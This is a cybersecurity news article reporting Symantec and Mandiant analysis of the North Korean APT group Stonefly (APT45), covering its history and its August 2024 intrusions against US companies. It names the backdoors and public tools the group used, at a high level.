Private US companies targeted by Stonefly APT
Undeterred by the indictment issued against one of its alleged members, North Korean APT group Stonefly (aka APT45) continues to target companies in the US, Symantec threat analysts warned.
About Stonefly
Also known as Andariel and OnyxFleet, Stonefly has been linked to the linked to the Reconnaissance General Bureau (RGB), a North Korean military intelligence agency.
Assessed structure of DPRK cyber operations in 2024 (Source: Mandiant)
“APT45 relies on a mix of publicly available tools such as 3PROXY, malware modified from publicly available malware such as ROGUEEYE, and custom malware families,” Mandiant’s threat analysts previously noted.
“Like most groups of [Democratic People’s Republic of Korea] activity, APT45 malware exhibits distinct shared characteristics over time, including the re-use of code, unique custom encoding, and passwords. APT45 leverages a library of malware tools which are relatively distinct from other North Korean activity clusters.”
According to Mandiant, the group:
- Has been active since at least 2009
- Has initially been engaged in espionage campaigns against government agencies and defense industries, but has since added financially-motivated attacks to its repertory
- Targeted organizations in the financial sector, nuclear-related entities, and organizations involved in health-related research
“Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities,” Mandiant analysts said, and added that there is a good possibility that the group has engaged in the development and deployment of ransomware.
The latest attacks
Symantec’s threat hunters say that in three separate intrusions against different US organizations in August 2024, the attackers were ultimately unable to deploy ransomware on the networks.
Nevertheless, they believe it likely that the attacks were financially motivated: “All the victims were private companies and involved in businesses with no obvious intelligence value.”
The thing that points to Stonefly’s involvement in the attacks is Preft, which is a custom, persistent backdoor exclusively associated with the group, as well as indicators of compromise previously tied to the group.
The group also used another backdoor (Nukebot), malicious batch files, two distinct keyloggers, and publicly available tools (Mimikatz, Sliver, Plink, Megatools, FastReverseProxy, etc.).
“The group is likely continuing to attempt to mount extortion attacks against organizations in the US,” the analysts opined, and shared the most recent indicators of compromise.